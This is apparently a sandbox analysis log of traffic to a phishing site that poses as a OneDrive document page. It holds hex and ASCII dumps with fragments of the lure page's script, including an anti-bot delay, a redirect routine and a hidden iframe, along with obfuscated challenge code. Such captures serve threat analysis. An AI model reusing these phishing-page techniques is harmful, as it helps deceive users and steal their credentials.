49 43 41 67 49 43 41 67 49 43 41 67 Data Ascii: W5ndGggPiAwKSB7CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkb2N1bWVudC5mb3Jtc1swXS5zdWJtaXQoKTsKICB9IGVsc2UgewogICAgICAgICAgICAgICAgICAgaWYgKCF3aW5kb3cubG9jYXRpb24uaGFzaCkgewogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg
2025-03-25 20:29:24 UTC	1369	IN	Data Raw: 41 67 49 43 41 67 49 43 42 34 61 48 52 30 63 43 35 7a 5a 58 52 53 5a 58 46 31 5a 58 4e 30 53 47 56 68 5a 47 56 79 4b 43 64 59 4c 56 4a 6c 63 58 56 6c 63 33 52 6c 5a 43 31 33 61 58 52 6f 4a 79 77 67 4a 31 68 4e 54 45 68 30 64 48 42 53 5a 58 46 31 5a 58 4e 30 4a 79 6b 37 43 69 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 48 68 6f 64 48 52 77 4c 6e 4e 6c 64 46 4a 6c 63 58 56 6c 63 33 52 49 5a 57 46 6b 5a 58 49 6f 4a 31 67 74 55 6d 56 78 64 57 56 7a 64 47 56 6b 4c 56 52 70 62 57 56 54 64 47 46 74 63 43 63 73 49 43 63 6e 4b 54 73 4b 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 65 47 68 30 64 48 41 75 63 32 56 30 55 6d 56 78 64 57 56 7a 64 45 68 6c 59 57 52 6c 63 Data Ascii: AgICAgICB4aHR0cC5zZXRSZXF1ZXN0SGVhZGVyKCdYLVJlcXVlc3RlZC13aXRoJywgJ1hNTEh0dHBSZXF1ZXN0Jyk7CiAgICAgICAgICAgICAgICAgICAgICAgIHhodHRwLnNldFJlcXVlc3RIZWFkZXIoJ1gtUmVxdWVzdGVkLVRpbWVTdGFtcCcsICcnKTsKICAgICAgICAgICAgICAgICAgICAgICAgeGh0dHAuc2V0UmVxdWVzdEhlYWRlc
2025-03-25 20:29:24 UTC	488	IN	Data Raw: 27 69 66 72 61 6d 65 27 29 3b 61 2e 68 65 69 67 68 74 3d 31 3b 61 2e 77 69 64 74 68 3d 31 3b 61 2e 73 74 79 6c 65 2e 70 6f 73 69 74 69 6f 6e 3d 27 61 62 73 6f 6c 75 74 65 27 3b 61 2e 73 74 79 6c 65 2e 74 6f 70 3d 30 3b 61 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 30 3b 61 2e 73 74 79 6c 65 2e 62 6f 72 64 65 72 3d 27 6e 6f 6e 65 27 3b 61 2e 73 74 79 6c 65 2e 76 69 73 69 62 69 6c 69 74 79 3d 27 68 69 64 64 65 6e 27 3b 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 3b 69 66 28 27 6c 6f 61 64 69 6e 67 27 21 3d 3d 64 6f 63 75 6d 65 6e 74 2e 72 65 61 64 79 53 74 61 74 65 29 63 28 29 3b 65 6c 73 65 20 69 66 28 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 29 64 6f 63 75 6d 65 6e 74 2e 61 64 64 45 76 65 6e 74 Data Ascii: 'iframe');a.height=1;a.width=1;a.style.position='absolute';a.style.top=0;a.style.left=0;a.style.border='none';a.style.visibility='hidden';document.body.appendChild(a);if('loading'!==document.readyState)c();else if(window.addEventListener)document.addEvent
2025-03-25 20:29:24 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
2025-03-25 20:29:24 UTC	1243	OUT	POST /ZayUC/?email=john.smith%40microsoft.com HTTP/1.1 Host: proposaldocumentsviasecuredport.com Connection: keep-alive Content-Length: 22 sec-ch-ua-platform: "Windows" X-Requested-TimeStamp-Combination: X-Requested-TimeStamp: X-Requested-Type-Combination: GET sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 jOTHbG-PGUIL0SGVl0fMm1ogiY0: 44282349 X-Requested-with: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 X-Requested-Type: GET Content-type: application/x-www-form-urlencoded X-Requested-TimeStamp-Expire: Accept: / Origin: https://proposaldocumentsviasecuredport.com Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://proposaldocumentsviasecuredport.com/ZayUC/?email=john.smith%40microsoft.com Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9 Cookie: 5fPcEN940Iij5LexFBM8i1K_NUI=cFLzUvmOaMFVSJXyIoQ9gitKf48; Hrtt5L2PUT1G82Ub72LRnRj2zEY=1742934563; HOvzofOCL_89s0mwUIUtH06-Y44=1743020963; nl7hDPvwUmmdFxUfvww3WgqLk9M=LhWaadEVmztEguxdRXgPVGKflPs; fSR249O6MYLvXM5jpcNL1q5tr4o=3hzZJGaeMvYM7jRNJS9rkFgWO3M
2025-03-25 20:29:24 UTC	22	OUT	Data Raw: 6e 61 6d 65 31 3d 48 65 6e 72 79 26 6e 61 6d 65 32 3d 46 6f 72 64 Data Ascii: name1=Henry&name2=Ford
2025-03-25 20:29:24 UTC	1349	IN	HTTP/1.1 204 No Content Date: Tue, 25 Mar 2025 20:29:24 GMT Connection: close X-Content-Type-Options: nosniff X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block X-XSS-Protection: 1; mode=block Set-Cookie: fSR249O6MYLvXM5jpcNL1q5tr4o=3hzZJGaeMvYM7jRNJS9rkFgWO3M; path=/; expires=Wed, 26-Mar-25 20:29:24 GMT; Max-Age=86400; Set-Cookie: riUofr0n8AfLgf7hKnugHijGX0Q=1742934564; path=/; expires=Wed, 26-Mar-25 20:29:24 GMT; Max-Age=86400; Set-Cookie: PmYLFtceC7bvtWQUj0IlMMJPtHI=1743020964; path=/; expires=Wed, 26-Mar-25 20:29:24 GMT; Max-Age=86400; Set-Cookie: X7zD0pYRSM6DdHXP6iTHdTjmVGs=eta3_lUYomtUZ4JfPJkf_MS-Ukg; path=/; expires=Wed, 26-Mar-25 20:29:24 GMT; Max-Age=86400; X-Frame-Options: SAMEORIGIN Cache-Control: public, max-age=0 no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Expires: 0 X-Robots-Tag: noindex, nofollow cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DBI4pFwQz1FtrdquzyW7JJgxz2I7QTrrgpfGJsrgO9V2S6QlqWt%2FjHOCMfd5%2FEMYx7eJNea4YS99ajv2eEVzb9Q5sSmu3GnI3IPGU2g2Nw0yyJpUYyzaUZHJDpVHRQiH5QS8z9azL0FRM%2FCZ4Kps0WsAQCx5gg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 926129035894ed71-EWR alt-svc: h3=":443"; ma=86400
2025-03-25 20:29:24 UTC	221	IN	Data Raw: 73 65 72 76 65 72 2d 74 69 6d 69 6e 67 3a 20 63 66 4c 34 3b 64 65 73 63 3d 22 3f 70 72 6f 74 6f 3d 54 43 50 26 72 74 74 3d 31 30 31 31 32 34 26 6d 69 6e 5f 72 74 74 3d 31 30 31 30 31 37 26 72 74 74 5f 76 61 72 3d 32 31 33 35 34 26 73 65 6e 74 3d 37 26 72 65 63 76 3d 39 26 6c 6f 73 74 3d 30 26 72 65 74 72 61 6e 73 3d 30 26 73 65 6e 74 5f 62 79 74 65 73 3d 32 38 39 36 26 72 65 63 76 5f 62 79 74 65 73 3d 31 38 38 31 26 64 65 6c 69 76 65 72 79 5f 72 61 74 65 3d 33 36 38 34 32 26 63 77 6e 64 3d 32 33 36 26 75 6e 73 65 6e 74 5f 62 79 74 65 73 3d 30 26 63 69 64 3d 30 65 64 38 61 39 36 32 61 33 31 65 38 62 30 33 26 74 73 3d 31 31 35 35 26 78 3d 30 22 0d 0a 0d 0a Data Ascii: server-timing: cfL4;desc="?proto=TCP&rtt=101124&min_rtt=101017&rtt_var=21354&sent=7&recv=9&lost=0&retrans=0&sent_bytes=2896&recv_bytes=1881&delivery_rate=36842&cwnd=236&unsent_bytes=0&cid=0ed8a962a31e8b03&ts=1155&x=0"

Timestamp	Bytes transferred	Direction	Data
2025-03-25 20:29:24 UTC	598	OUT	OPTIONS /report/v4?s=MdD2B%2FKtKxUf49Q%2BiEUqJPicetOC336V638UqNqvbhYY%2F1TExLbb8dagiaq8N61MpFdZX360bMTOn1ndi0QR3JziZyxEpymiRSgTx57%2Fl5pX8eC%2FLlioHYwsSYg6Qe%2Bum2P6sHQYqlxGhLcTWgmUl3BsYnOx7Q%3D%3D HTTP/1.1 Host: a.nel.cloudflare.com Connection: keep-alive Origin: https://proposaldocumentsviasecuredport.com Access-Control-Request-Method: POST Access-Control-Request-Headers: content-type User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-25 20:29:24 UTC	336	IN	HTTP/1.1 200 OK Content-Length: 0 access-control-max-age: 86400 access-control-allow-methods: OPTIONS, POST access-control-allow-origin: * access-control-allow-headers: content-type, content-length date: Tue, 25 Mar 2025 20:29:24 GMT Via: 1.1 google Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Timestamp	Bytes transferred	Direction	Data
2025-03-25 20:29:24 UTC	812	OUT	GET /cdn-cgi/challenge-platform/scripts/jsd/main.js HTTP/1.1 Host: proposaldocumentsviasecuredport.com Connection: keep-alive sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 Accept: / Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9 Cookie: 5fPcEN940Iij5LexFBM8i1K_NUI=cFLzUvmOaMFVSJXyIoQ9gitKf48; Hrtt5L2PUT1G82Ub72LRnRj2zEY=1742934563; HOvzofOCL_89s0mwUIUtH06-Y44=1743020963; nl7hDPvwUmmdFxUfvww3WgqLk9M=LhWaadEVmztEguxdRXgPVGKflPs; fSR249O6MYLvXM5jpcNL1q5tr4o=3hzZJGaeMvYM7jRNJS9rkFgWO3M
2025-03-25 20:29:24 UTC	947	IN	HTTP/1.1 302 Found Date: Tue, 25 Mar 2025 20:29:24 GMT Content-Length: 0 Connection: close location: /cdn-cgi/challenge-platform/h/b/scripts/jsd/708f7a809116/main.js? cache-control: max-age=300, stale-if-error=10800, stale-while-revalidate=10800, public access-control-allow-origin: * Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7R6FdHDugSNiBPcN8j3ma4dy3ljUNfc0qgm%2BktEj6%2Bk3%2F%2FrqbUIE0vwlLsLVVw1jT8AZ11M4jOBoXvLsufWfzkrpCyZwS91vnu8OMDRtbUKF8ZRqsaBwT3o6xiWDKVVwF6WVtBqg4395IXrqexCHXbwcd2RSzA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 92612905986525dc-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=99005&min_rtt=98893&rtt_var=21045&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2896&recv_bytes=1384&delivery_rate=37493&cwnd=237&unsent_bytes=0&cid=92933c45058bee86&ts=256&x=0"

Timestamp	Bytes transferred	Direction	Data
2025-03-25 20:29:24 UTC	573	OUT	POST /report/v4?s=MdD2B%2FKtKxUf49Q%2BiEUqJPicetOC336V638UqNqvbhYY%2F1TExLbb8dagiaq8N61MpFdZX360bMTOn1ndi0QR3JziZyxEpymiRSgTx57%2Fl5pX8eC%2FLlioHYwsSYg6Qe%2Bum2P6sHQYqlxGhLcTWgmUl3BsYnOx7Q%3D%3D HTTP/1.1 Host: a.nel.cloudflare.com Connection: keep-alive Content-Length: 444 Content-Type: application/reports+json Origin: https://proposaldocumentsviasecuredport.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-25 20:29:24 UTC	444	OUT	Data Raw: 5b 7b 22 61 67 65 22 3a 32 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 38 31 37 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 30 34 2e 32 31 2e 39 32 2e 31 31 37 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 35 30 33 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 70 72 6f 70 6f 73 61 6c 64 6f 63 75 6d 65 6e 74 Data Ascii: [{"age":2,"body":{"elapsed_time":817,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"","sampling_fraction":1.0,"server_ip":"104.21.92.117","status_code":503,"type":"http.error"},"type":"network-error","url":"https://proposaldocument
2025-03-25 20:29:25 UTC	214	IN	HTTP/1.1 200 OK Content-Length: 0 access-control-allow-origin: * vary: Origin date: Tue, 25 Mar 2025 20:29:24 GMT Via: 1.1 google Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Timestamp	Bytes transferred	Direction	Data
2025-03-25 20:29:24 UTC	1201	OUT	GET /ZayUC/?email=john.smith%40microsoft.com HTTP/1.1 Host: proposaldocumentsviasecuredport.com Connection: keep-alive sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-Dest: document Referer: https://proposaldocumentsviasecuredport.com/ZayUC/?email=john.smith%40microsoft.com Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9 Cookie: 5fPcEN940Iij5LexFBM8i1K_NUI=cFLzUvmOaMFVSJXyIoQ9gitKf48; Hrtt5L2PUT1G82Ub72LRnRj2zEY=1742934563; HOvzofOCL_89s0mwUIUtH06-Y44=1743020963; nl7hDPvwUmmdFxUfvww3WgqLk9M=LhWaadEVmztEguxdRXgPVGKflPs; fSR249O6MYLvXM5jpcNL1q5tr4o=3hzZJGaeMvYM7jRNJS9rkFgWO3M; riUofr0n8AfLgf7hKnugHijGX0Q=1742934564; PmYLFtceC7bvtWQUj0IlMMJPtHI=1743020964; X7zD0pYRSM6DdHXP6iTHdTjmVGs=eta3_lUYomtUZ4JfPJkf_MS-Ukg
2025-03-25 20:29:25 UTC	1010	IN	HTTP/1.1 200 OK Date: Tue, 25 Mar 2025 20:29:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding X-Content-Type-Options: nosniff X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block X-XSS-Protection: 1; mode=block X-Robots-Tag: noindex, nofollow cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GNJv4LgTVPWDtZlN085Xm6pf7uu%2F8zIc4FuavpZokTjINQwWpJ3V8fzWwUGmMHobmYEtzdhTlGJGDJDSXVRIJxHvoat3Zd%2FmSiVYtEsl%2FXUdiWTxFC4eBcfZLLzWG0NAhNsAaPe1UiPzutrozLkuQcKdCNWmFg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9261290858884283-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=105506&min_rtt=101197&rtt_var=25765&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2895&recv_bytes=1773&delivery_rate=36746&cwnd=245&unsent_bytes=0&cid=d744a74eaef9216b&ts=566&x=0"
2025-03-25 20:29:25 UTC	359	IN	Data Raw: 39 33 37 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 20 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 4f 6e 65 44 72 69 76 65 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 2f 2f 20 54 69 6d 65 20 64 65 6c 61 79 20 28 74 6f 20 70 72 65 76 65 6e 74 20 69 6d 6d 65 64 69 61 74 65 20 62 6f 74 20 61 63 74 69 76 69 74 79 29 0d 0a 20 20 20 20 6c 65 74 20 Data Ascii: 937<html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /><title>OneDrive</title><script type="text/javascript"> // Time delay (to prevent immediate bot activity) let
2025-03-25 20:29:25 UTC	1369	IN	Data Raw: 20 54 68 69 73 20 66 75 6e 63 74 69 6f 6e 20 72 75 6e 73 20 77 68 65 6e 20 74 68 65 20 70 61 67 65 20 69 73 20 6c 6f 61 64 65 64 0d 0a 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 74 69 6d 65 72 20 3d 20 73 65 74 54 69 6d 65 6f 75 74 28 65 6e 61 62 6c 65 52 65 64 69 72 65 63 74 69 6f 6e 2c 20 6d 69 6e 54 69 6d 65 29 3b 20 2f 2f 20 53 74 61 72 74 20 74 68 65 20 63 6f 75 6e 74 64 6f 77 6e 0d 0a 20 20 20 20 7d 3b 0d 0a 0d 0a 20 20 20 20 66 75 6e 63 74 69 6f 6e 20 65 6e 61 62 6c 65 52 65 64 69 72 65 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 2f 2f 20 4f 6e 6c 79 20 72 65 64 69 72 65 63 74 20 69 66 20 4a 61 76 61 53 63 72 69 70 74 20 72 75 6e 73 20 61 6e 64 20 6d 69 Data Ascii: This function runs when the page is loaded window.onload = function() { timer = setTimeout(enableRedirection, minTime); // Start the countdown }; function enableRedirection() { // Only redirect if JavaScript runs and mi
2025-03-25 20:29:25 UTC	638	IN	Data Raw: 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 27 68 65 61 64 27 29 5b 30 5d 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 3b 22 3b 62 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 27 68 65 61 64 27 29 5b 30 5d 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 64 29 7d 7d 69 66 28 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 29 7b 76 61 72 20 61 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 69 66 72 61 6d 65 27 29 3b 61 2e 68 65 69 67 68 74 3d 31 3b 61 2e 77 69 64 74 68 3d 31 3b 61 2e 73 74 79 6c 65 2e 70 6f 73 69 74 69 6f 6e 3d 27 61 62 73 6f 6c 75 74 65 27 3b 61 2e 73 74 79 6c 65 2e 74 6f 70 3d 30 3b 61 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 30 3b 61 2e 73 74 79 6c 65 2e 62 6f 72 64 65 72 3d 27 6e 6f Data Ascii: nt.getElementsByTagName('head')[0].appendChild(a);";b.getElementsByTagName('head')[0].appendChild(d)}}if(document.body){var a=document.createElement('iframe');a.height=1;a.width=1;a.style.position='absolute';a.style.top=0;a.style.left=0;a.style.border='no
2025-03-25 20:29:25 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
2025-03-25 20:29:25 UTC	967	OUT	GET /cdn-cgi/challenge-platform/h/b/scripts/jsd/708f7a809116/main.js? HTTP/1.1 Host: proposaldocumentsviasecuredport.com Connection: keep-alive sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 Accept: / Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9 Cookie: 5fPcEN940Iij5LexFBM8i1K_NUI=cFLzUvmOaMFVSJXyIoQ9gitKf48; Hrtt5L2PUT1G82Ub72LRnRj2zEY=1742934563; HOvzofOCL_89s0mwUIUtH06-Y44=1743020963; nl7hDPvwUmmdFxUfvww3WgqLk9M=LhWaadEVmztEguxdRXgPVGKflPs; fSR249O6MYLvXM5jpcNL1q5tr4o=3hzZJGaeMvYM7jRNJS9rkFgWO3M; riUofr0n8AfLgf7hKnugHijGX0Q=1742934564; PmYLFtceC7bvtWQUj0IlMMJPtHI=1743020964; X7zD0pYRSM6DdHXP6iTHdTjmVGs=eta3_lUYomtUZ4JfPJkf_MS-Ukg
2025-03-25 20:29:25 UTC	928	IN	HTTP/1.1 200 OK Date: Tue, 25 Mar 2025 20:29:25 GMT Content-Type: application/javascript; charset=UTF-8 Content-Length: 8429 Connection: close cache-control: max-age=14400, stale-if-error=10800, stale-while-revalidate=10800, public x-content-type-options: nosniff Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PrgHxBvJRkGQ3PyAk%2F03Iud9Z8l9LqDOyYoHlajmUj92aQETxLTsjfR4S3UT%2B21BNY1tk5qyN5jU3aUC6dee1YD42uQkxyhThbYCuY%2Bki32X4TTUswsVS76C4wMgs19xrWkydxtOgelX30Dd1CzSipDVbZe6%2Bw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 926129088cc0b432-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=103700&min_rtt=102258&rtt_var=23077&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2896&recv_bytes=1561&delivery_rate=36427&cwnd=228&unsent_bytes=0&cid=24a2d5c21fcb52c8&ts=262&x=0"
2025-03-25 20:29:25 UTC	441	IN	Data Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 3d 7b 63 46 50 57 76 3a 27 62 27 7d 3b 7e 66 75 6e 63 74 69 6f 6e 28 57 2c 68 2c 69 2c 6a 2c 6b 2c 6c 2c 73 2c 76 29 7b 57 3d 62 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 65 2c 56 2c 66 2c 67 29 7b 66 6f 72 28 56 3d 62 2c 66 3d 63 28 29 3b 21 21 5b 5d 3b 29 74 72 79 7b 69 66 28 67 3d 2d 70 61 72 73 65 49 6e 74 28 56 28 33 35 30 29 29 2f 31 2b 70 61 72 73 65 49 6e 74 28 56 28 32 39 38 29 29 2f 32 2b 2d 70 61 72 73 65 49 6e 74 28 56 28 33 30 38 29 29 2f 33 2a 28 2d 70 61 72 73 65 49 6e 74 28 56 28 33 36 35 29 29 2f 34 29 2b 2d 70 61 72 73 65 49 6e 74 28 56 28 33 35 38 29 29 2f 35 2b 2d 70 61 72 73 65 49 6e 74 28 56 28 33 39 30 29 29 2f 36 2a 28 70 61 72 73 65 49 6e 74 28 56 28 33 34 30 29 29 2f 37 29 2b 2d 70 Data Ascii: window._cf_chl_opt={cFPWv:'b'};~function(W,h,i,j,k,l,s,v){W=b,function(c,e,V,f,g){for(V=b,f=c();!![];)try{if(g=-parseInt(V(350))/1+parseInt(V(298))/2+-parseInt(V(308))/3(-parseInt(V(365))/4)+-parseInt(V(358))/5+-parseInt(V(390))/6(parseInt(V(340))/7)+-p
2025-03-25 20:29:25 UTC	1369	IN	Data Raw: 20 58 3d 57 2c 65 3d 53 74 72 69 6e 67 5b 58 28 33 35 39 29 5d 2c 66 3d 7b 27 68 27 3a 66 75 6e 63 74 69 6f 6e 28 45 29 7b 72 65 74 75 72 6e 20 45 3d 3d 6e 75 6c 6c 3f 27 27 3a 66 2e 67 28 45 2c 36 2c 66 75 6e 63 74 69 6f 6e 28 46 2c 59 29 7b 72 65 74 75 72 6e 20 59 3d 62 2c 59 28 33 33 35 29 5b 59 28 33 35 31 29 5d 28 46 29 7d 29 7d 2c 27 67 27 3a 66 75 6e 63 74 69 6f 6e 28 45 2c 46 2c 47 2c 5a 2c 48 2c 49 2c 4a 2c 4b 2c 4c 2c 4d 2c 4e 2c 4f 2c 50 2c 51 2c 52 2c 53 2c 54 2c 55 29 7b 69 66 28 5a 3d 58 2c 45 3d 3d 6e 75 6c 6c 29 72 65 74 75 72 6e 27 27 3b 66 6f 72 28 49 3d 7b 7d 2c 4a 3d 7b 7d 2c 4b 3d 27 27 2c 4c 3d 32 2c 4d 3d 33 2c 4e 3d 32 2c 4f 3d 5b 5d 2c 50 3d 30 2c 51 3d 30 2c 52 3d 30 3b 52 3c 45 5b 5a 28 33 37 37 29 5d 3b 52 2b 3d 31 29 69 66 28 Data Ascii: X=W,e=String[X(359)],f={'h':function(E){return E==null?'':f.g(E,6,function(F,Y){return Y=b,Y(335)[Y(351)](F)})},'g':function(E,F,G,Z,H,I,J,K,L,M,N,O,P,Q,R,S,T,U){if(Z=X,E==null)return'';for(I={},J={},K='',L=2,M=3,N=2,O=[],P=0,Q=0,R=0;R<E[Z(377)];R+=1)if(
2025-03-25 20:29:25 UTC	1369	IN	Data Raw: 2c 4e 29 2c 4e 2b 2b 29 2c 64 65 6c 65 74 65 20 4a 5b 4b 5d 7d 65 6c 73 65 20 66 6f 72 28 55 3d 49 5b 4b 5d 2c 48 3d 30 3b 48 3c 4e 3b 50 3d 50 3c 3c 31 7c 31 2e 36 32 26 55 2c 51 3d 3d 46 2d 31 3f 28 51 3d 30 2c 4f 5b 5a 28 34 30 32 29 5d 28 47 28 50 29 29 2c 50 3d 30 29 3a 51 2b 2b 2c 55 3e 3e 3d 31 2c 48 2b 2b 29 3b 4c 2d 2d 2c 4c 3d 3d 30 26 26 4e 2b 2b 7d 66 6f 72 28 55 3d 32 2c 48 3d 30 3b 48 3c 4e 3b 50 3d 55 26 31 2e 30 39 7c 50 3c 3c 31 2e 36 34 2c 46 2d 31 3d 3d 51 3f 28 51 3d 30 2c 4f 5b 5a 28 34 30 32 29 5d 28 47 28 50 29 29 2c 50 3d 30 29 3a 51 2b 2b 2c 55 3e 3e 3d 31 2c 48 2b 2b 29 3b 66 6f 72 28 3b 3b 29 69 66 28 50 3c 3c 3d 31 2c 46 2d 31 3d 3d 51 29 7b 4f 5b 5a 28 34 30 32 29 5d 28 47 28 50 29 29 3b 62 72 65 61 6b 7d 65 6c 73 65 20 51 2b Data Ascii: ,N),N++),delete J[K]}else for(U=I[K],H=0;H<N;P=P<<1\|1.62&U,Q==F-1?(Q=0,O[Z(402)](G(P)),P=0):Q++,U>>=1,H++);L--,L==0&&N++}for(U=2,H=0;H<N;P=U&1.09\|P<<1.64,F-1==Q?(Q=0,O[Z(402)](G(P)),P=0):Q++,U>>=1,H++);for(;;)if(P<<=1,F-1==Q){O[Z(402)](G(P));break}else Q+
